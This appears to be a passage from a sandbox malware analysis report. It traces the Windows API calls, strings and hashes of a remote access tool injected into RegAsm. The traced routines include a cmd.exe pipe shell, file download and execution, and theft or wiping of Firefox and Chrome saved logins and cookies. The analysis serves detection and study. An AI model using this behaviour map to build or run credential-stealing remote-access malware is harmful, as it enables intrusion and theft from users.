• String ID:
• API String ID: 442123175-0
APIs
• socket.WS2_32(?,00000001,00000006), ref: 00401698
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040603A,00000000,?,0041054D), ref: 004016D4
  • Part of subcall function 004016E4: WSAStartup.WS2_32(00000202,00000000), ref: 004016F9
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CreateEventStartupsocket
• String ID:
• API String ID: 1953588214-0
APIs
• GetForegroundWindow.USER32 ref: 0041407F
• GetWindowTextW.USER32(00000000,?,00000100), ref: 00414092
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Window$ForegroundText
• String ID:
• API String ID: 29597999-0
APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,0040A324,Exe,00000000,0000000E,00000000,004595AC,00000003,00000000), ref: 004087FE
• GetLastError.KERNEL32 ref: 00408804
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CreateErrorLastMutex
• String ID:
• API String ID: 1925916568-0
APIs
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
APIs
  • Part of subcall function 0041EE6D: recv.WS2_32(?,?,?,?), ref: 0041EE78
• WSAGetLastError.WS2_32 ref: 0041EDB7
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ErrorLastrecv
• String ID:
• API String ID: 2514157807-0
APIs
• RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,0043C6C9,00000001,00000364,?,004322D5,00000000,00000000,00000000,00000000,00000000,?,00467F30), ref: 0043AFD6
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
  • Part of subcall function 0041EE86: send.WS2_32(?,?,?,?), ref: 0041EE91
• WSAGetLastError.WS2_32 ref: 0041EE28
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ErrorLastsend
• String ID:
• API String ID: 1802528911-0
APIs
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
APIs
• RtlAllocateHeap.NTDLL(00000000,0042CBD9,?,?,0042E317,?,?,5.1.3 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
• WSAStartup.WS2_32(00000202,00000000), ref: 004016F9
Similarity
• API ID: Startup
• String ID:
• API String ID: 724789610-0
APIs
• CreateFileW.KERNEL32(00000000,00000000,?,00449188,?,?,00000000,?,00449188,00000000,0000000C), ref: 00448DCA
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
Similarity
• API ID: recv
• String ID:
• API String ID: 1507349165-0
Similarity
• API ID: send
• String ID:
• API String ID: 2809346765-0
APIs
• SetEvent.KERNEL32(?,?), ref: 0040513C
• GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 0040520A
• DeleteFileW.KERNEL32(00000000), ref: 0040522C
  • Part of subcall function 00414795: FindFirstFileW.KERNEL32(?,?,00467C58,?), ref: 0041482C
  • Part of subcall function 00414795: FindNextFileW.KERNEL32(00000000,?), ref: 00414863
  • Part of subcall function 00414795: RemoveDirectoryW.KERNEL32(?), ref: 004148DD
  • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
  • Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6
  • Part of subcall function 004018E7: WaitForSingleObject.KERNEL32(?,00000000,?,00000008,00000004,00000000,0000000C,00000000,?,?,00467C58), ref: 0040196B
  • Part of subcall function 004018E7: SetEvent.KERNEL32(?,?,00467C58,?,?,?,?,?,?,004049F5,000000B2), ref: 00401999
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00405619
• GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004056FA
• SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 00405946
• DeleteFileA.KERNEL32(?), ref: 00405AD4
  • Part of subcall function 00405C8E: __EH_prolog.LIBCMT ref: 00405C93
  • Part of subcall function 00405C8E: FindFirstFileW.KERNEL32(00000000,?,004596B8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405D4C
  • Part of subcall function 00405C8E: __CxxThrowException@8.LIBVCRUNTIME ref: 00405D74
  • Part of subcall function 00405C8E: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405D81
• Sleep.KERNEL32(000007D0), ref: 00405B7A
• StrToIntA.SHLWAPI(00000000,00000000), ref: 00405BBC
  • Part of subcall function 00414D7F: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 00414E74
Similarity
• API ID: File$Find$AttributesDeleteEventFirstNext$DirectoryDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersRemoveShellSingleSleepStringsSystemThrowTimeWaitsend
• String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$X|F$open
• API String ID: 577278831-3555090288
APIs
• __Init_thread_footer.LIBCMT ref: 00403B5D
  • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
• __Init_thread_footer.LIBCMT ref: 00403B9A
• CreatePipe.KERNEL32(004697C4,004697AC,004696D0,00000000,004595AC,00000000), ref: 00403C28
• CreatePipe.KERNEL32(004697B0,004697CC,004696D0,00000000), ref: 00403C42
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,004696E0,004697B4), ref: 00403CB8
• Sleep.KERNEL32(0000012C,00000093,?), ref: 00403D0F
• PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00403D32
• ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00403D5C
• WriteFile.KERNEL32(00000000,00000000,?,00000000,00467D08,004595B0,00000062,00459594), ref: 00403E5C
  • Part of subcall function 0042BE7E: __onexit.LIBCMT ref: 0042BE84
• Sleep.KERNEL32(00000064,00000062,00459594), ref: 00403E78
• TerminateProcess.KERNEL32(00000000), ref: 00403E91
• CloseHandle.KERNEL32 ref: 00403E9D
• CloseHandle.KERNEL32 ref: 00403EA5
• CloseHandle.KERNEL32 ref: 00403EB7
• CloseHandle.KERNEL32 ref: 00403EBF
Similarity
• API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
• String ID: SystemDrive$cmd.exe
• API String ID: 2994406822-3633465311
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040805D
• FindClose.KERNEL32(00000000), ref: 00408077
• FindNextFileA.KERNEL32(00000000,?), ref: 004081AE
• FindClose.KERNEL32(00000000), ref: 004081D4
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
• API String ID: 1164774033-3681987949
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\,?,00000000), ref: 00408271
• FindClose.KERNEL32(00000000,?,00000000), ref: 00408287
• FindNextFileA.KERNEL32(00000000,?,?,00000000), ref: 004082B1
• DeleteFileA.KERNEL32(00000000,00000000,?,00000000), ref: 00408359
• GetLastError.KERNEL32(?,00000000), ref: 00408363
• FindNextFileA.KERNEL32(00000000,00000010,?,00000000), ref: 00408377
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040839D
• FindClose.KERNEL32(00000000,?,00000000), ref: 004083BE
Similarity
• API ID: Find$File$Close$Next$DeleteErrorFirstLast
• String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
• API String ID: 532992503-432212279
Similarity
• API ID:
• String ID: 0$1$2$3$4$5$6$7
• API String ID: 0-3177665633
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00468490), ref: 00412EAD
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00412EF4
• GetLastError.KERNEL32 ref: 00412F02
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 00412F33
• OpenServiceW.ADVAPI32(00000000,?,00000001,00000000,0045F170,00000000,0045F170,00000000,0045F170), ref: 00413003
Similarity
• API ID: EnumOpenServicesStatus$ErrorLastManagerService
• String ID:
• API String ID: 2247270020-0
APIs
• FindFirstFileW.KERNEL32(?,?,00467C58,?), ref: 0041482C
• FindNextFileW.KERNEL32(00000000,?), ref: 00414863
• RemoveDirectoryW.KERNEL32(?), ref: 004148DD
• FindClose.KERNEL32(00000000), ref: 0041490B
• RemoveDirectoryW.KERNEL32(?), ref: 00414914
• SetFileAttributesW.KERNEL32(?,00000080), ref: 00414931
• DeleteFileW.KERNEL32(?), ref: 0041493E
• GetLastError.KERNEL32 ref: 00414966
• FindClose.KERNEL32(00000000), ref: 00414979
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                              • String ID:
                                                                                              • API String ID: 2341273852-0
                                                                                              • Opcode ID: b1399265cc0181db245dfadc9b8a2d58ab97f5fa36428480ebc21028d0ad051d
                                                                                              • Instruction ID: 67d1b46c084ba7a1db363377ae0973eb7806ada5b67af0ef92577c41b38a644f
                                                                                              • Opcode Fuzzy Hash: b1399265cc0181db245dfadc9b8a2d58ab97f5fa36428480ebc21028d0ad051d
                                                                                              • Instruction Fuzzy Hash: B3513B799002598ACF24EF78C8446FBB375FF95304F5041EAE84597250EB758EC6CB58
                                                                                              APIs
                                                                                              • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0040DA73
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0040DA7F
                                                                                                • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                                                                              • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0040DC4F
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040DC56
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                              • API String ID: 2127411465-314212984
                                                                                              • Opcode ID: 60a29829e8ec836dbfb95753b66f99fb8d2724bec4b539cd6858d8474a25220a
                                                                                              • Instruction ID: 4074bb3242a5131e9af16332fb1fca2d579f27d95419dd5672c9eea20478749a
                                                                                              • Opcode Fuzzy Hash: 60a29829e8ec836dbfb95753b66f99fb8d2724bec4b539cd6858d8474a25220a
                                                                                              • Instruction Fuzzy Hash: 05C1F872A1430066C604BB76CD5B96E36A99F95748F40093FF606BB1D3ED7C9A0CC39A
                                                                                              APIs
                                                                                                • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                                                                                • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                                                                                • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                                                                                • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                                                                                • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C673
                                                                                                • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C680
                                                                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044492D
                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 00444988
                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 00444997
                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,0043A13A,00000040,?,0043A25A,00000055,00000000,?,?,00000055,00000000), ref: 004449DF
                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,0043A1BA,00000040), ref: 004449FE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                              • String ID: |9E
                                                                                              • API String ID: 745075371-2862116995
                                                                                              • Opcode ID: 0182595e9ec61d298165f777257464cb6325a84e03ddbfac1df3a5c242788ce8
                                                                                              • Instruction ID: a0d23eae2eab3cce0e6143c8aade0d1d31ecb2808b135d4201b82ffc1078fed3
                                                                                              • Opcode Fuzzy Hash: 0182595e9ec61d298165f777257464cb6325a84e03ddbfac1df3a5c242788ce8
                                                                                              • Instruction Fuzzy Hash: BD5181B1900219ABFF10EFB5DC46BBF73B8EF89701F04016AE910E7290D77899409B69
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0044496C,?,00000000), ref: 004446E6
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0044496C,?,00000000), ref: 0044470F
                                                                                              • GetACP.KERNEL32(?,?,0044496C,?,00000000), ref: 00444724
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID: ACP$OCP$lID
                                                                                              • API String ID: 2299586839-1000943563
                                                                                              • Opcode ID: 535f5f0039f378c257daf72af548440bc366aacbd73dd159417f70e193030085
                                                                                              • Instruction ID: b776c1f794edacfa1d566d42b41839c959f8c97492637f1cf3d15b7234cf2928
                                                                                              • Opcode Fuzzy Hash: 535f5f0039f378c257daf72af548440bc366aacbd73dd159417f70e193030085
                                                                                              • Instruction Fuzzy Hash: F421C462A00101AAF7308F64C800B97B3A6FFD6B55B578166E80AC7310FB3EDE41C758
                                                                                              APIs
                                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data,00000000), ref: 00407EFC
                                                                                              • GetLastError.KERNEL32 ref: 00407F06
                                                                                              Strings
                                                                                              • [Chrome StoredLogins not found], xrefs: 00407F20
                                                                                              • [Chrome StoredLogins found, cleared!], xrefs: 00407F2C
                                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00407EC7
                                                                                              • UserProfile, xrefs: 00407ECC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DeleteErrorFileLast
                                                                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                              • API String ID: 2018770650-1062637481
                                                                                              • Opcode ID: c03a34522a1bd99ec328411317d4ae97edc3be59d92fa28a2dfb0bdd23ac4345
                                                                                              • Instruction ID: cd3047e91bfde3af176f2c882389411367fa10c8d8f2a88c8bde0a27d8164f9d
                                                                                              • Opcode Fuzzy Hash: c03a34522a1bd99ec328411317d4ae97edc3be59d92fa28a2dfb0bdd23ac4345
                                                                                              • Instruction Fuzzy Hash: 38012631E941069BCA04BBB5CE1B8EE7724A961305F50017FFA02731D2ED7E5909C2DB
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000028,00000026,00000000,?,?,?,0040FC02,00000026), ref: 00410D32
                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,0040FC02,00000026), ref: 00410D39
                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00410D4B
                                                                                              • AdjustTokenPrivileges.ADVAPI32(00000026,00000000,?,00000000,00000000,00000000), ref: 00410D6A
                                                                                              • GetLastError.KERNEL32 ref: 00410D70
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                              • String ID: SeShutdownPrivilege
                                                                                              • API String ID: 3534403312-3733053543
                                                                                              • Opcode ID: 4f0843af285c796e462775612c2307230336999f361eb92c79c5e21bd3d822b6
                                                                                              • Instruction ID: 9eef06880bab16d35be2c706b8c727757efcd913256d8b96f55afeb896bd8697
                                                                                              • Opcode Fuzzy Hash: 4f0843af285c796e462775612c2307230336999f361eb92c79c5e21bd3d822b6
                                                                                              • Instruction Fuzzy Hash: 3FF03A75901128ABDB109BA0ED0DEEF7FBCEF06219F104061B905A2051D6744A09CAB5
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __floor_pentium4
                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                              • API String ID: 4168288129-2761157908
                                                                                              • Opcode ID: 0d68c6ebbb73ac1a38bae54d0b39483b1a61521fe969ecae4c95907e74ea9d28
                                                                                              • Instruction ID: 4aadb4acba26e1cacb22562d3062cd2e5fa0d248af99932944c2a23c9cbf1606
                                                                                              • Opcode Fuzzy Hash: 0d68c6ebbb73ac1a38bae54d0b39483b1a61521fe969ecae4c95907e74ea9d28
                                                                                              • Instruction Fuzzy Hash: 75C23C71E086288FEB65CE289D407EEB7B5EB44305F1545EBD40DE7240EB78AE828F45
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 004072EA
                                                                                                • Part of subcall function 0040170E: connect.WS2_32(?,?,?), ref: 00401726
                                                                                                • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00407382
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 004073E0
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00407438
                                                                                              • FindClose.KERNEL32(000000FF), ref: 0040744F
                                                                                                • Part of subcall function 00401C4F: WaitForSingleObject.KERNEL32(?,000000FF,00000000,?,00000000,00401AD4,00000000,?,?,?,?,00467C58), ref: 00401C59
                                                                                                • Part of subcall function 00401C4F: SetEvent.KERNEL32(?,?,00467C58), ref: 00401C68
                                                                                                • Part of subcall function 00401C4F: CloseHandle.KERNEL32(?,?,00467C58), ref: 00401C71
                                                                                              • FindClose.KERNEL32(00000000), ref: 0040768B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Find$Close$File$EventException@8FirstH_prologHandleNextObjectSingleThrowWaitconnectsend
                                                                                              • String ID:
                                                                                              • API String ID: 4178801697-0
                                                                                              • Opcode ID: 4ef0fa9968788e8b0817db2a64f54c3d4103c6ca0b97b15f0ad0523b28addf7b
                                                                                              • Instruction ID: 7202f6ce65fafa98fb7de63047c39e51e87502bb610d5f7c02fe3bbf75a70c5a
                                                                                              • Opcode Fuzzy Hash: 4ef0fa9968788e8b0817db2a64f54c3d4103c6ca0b97b15f0ad0523b28addf7b
                                                                                              • Instruction Fuzzy Hash: C0C1AC319001089BDB14EB60CD92AEE7779AF10318F50417EE906B71E1EB38AF49CB99
                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,?,00412DF3,00000000), ref: 00413174
                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,00412DF3,00000000), ref: 00413188
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,00412DF3,00000000), ref: 00413195
                                                                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,00412DF3,00000000), ref: 004131A0
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,00412DF3,00000000), ref: 004131B2
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,00412DF3,00000000), ref: 004131B5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                              • String ID:
                                                                                              • API String ID: 276877138-0
                                                                                              • Opcode ID: 3918c8a7ce19c406c69db840a7e5c63a46351091558a5f9bd009cd153cdc24fa
                                                                                              • Instruction ID: 728c1f078413431713c18eccfbc5b09ab83812d1f123983b22c07ece6b5a69bb
                                                                                              • Opcode Fuzzy Hash: 3918c8a7ce19c406c69db840a7e5c63a46351091558a5f9bd009cd153cdc24fa
                                                                                              • Instruction Fuzzy Hash: C6F0B4795011287FE2116F259C89DBF3B6CDF863AAF040026F90993140CE788E86A5B8
                                                                                              APIs
                                                                                                • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                                                                                • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                                                                                • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                                                                                • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0043A141,?,?,?,?,00439B98,?,00000004), ref: 00443FCB
                                                                                              • _wcschr.LIBVCRUNTIME ref: 0044405B
                                                                                              • _wcschr.LIBVCRUNTIME ref: 00444069
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,0043A141,00000000,0043A261), ref: 0044410C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                              • String ID: |9E
                                                                                              • API String ID: 4212172061-2862116995
                                                                                              • Opcode ID: d99bc2a9675463053ab5ccacbb4c5199fc514b40bbba0e249075e0b3688c31d4
                                                                                              • Instruction ID: 32e737dee43cd030fe8cef7ac27ade77768f3db5fce4e08c52ba53364ae33a46
                                                                                              • Opcode Fuzzy Hash: d99bc2a9675463053ab5ccacbb4c5199fc514b40bbba0e249075e0b3688c31d4
                                                                                              • Instruction Fuzzy Hash: A861FA71A00206AAF724AF76CC42BBB73A8EF44715F14052FFA05D7281EB78DD458769
                                                                                              APIs
                                                                                              • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 00413B96
                                                                                              • LoadResource.KERNEL32(00000000,?,?,0040A627,00000000), ref: 00413BAA
                                                                                              • LockResource.KERNEL32(00000000,?,?,0040A627,00000000), ref: 00413BB1
                                                                                              • SizeofResource.KERNEL32(00000000,?,?,0040A627,00000000), ref: 00413BC0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                              • String ID: SETTINGS
                                                                                              • API String ID: 3473537107-594951305
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00407738
                                                                                                • Part of subcall function 00406B5E: char_traits.LIBCPMT ref: 00406B79
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004077B0
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 004077D9
                                                                                              • FindClose.KERNEL32(000000FF), ref: 004077F0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Find$File$CloseFirstH_prologNextchar_traits
                                                                                              • String ID:
                                                                                              • API String ID: 3260228402-0
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00405C93
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,004596B8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405D4C
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00405D74
                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405D81
                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405EE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
